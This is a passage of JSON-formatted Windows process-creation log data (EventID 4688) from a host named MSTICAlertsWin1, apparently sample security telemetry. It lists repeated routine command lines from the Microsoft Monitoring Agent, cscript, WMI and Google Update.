Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4688,4688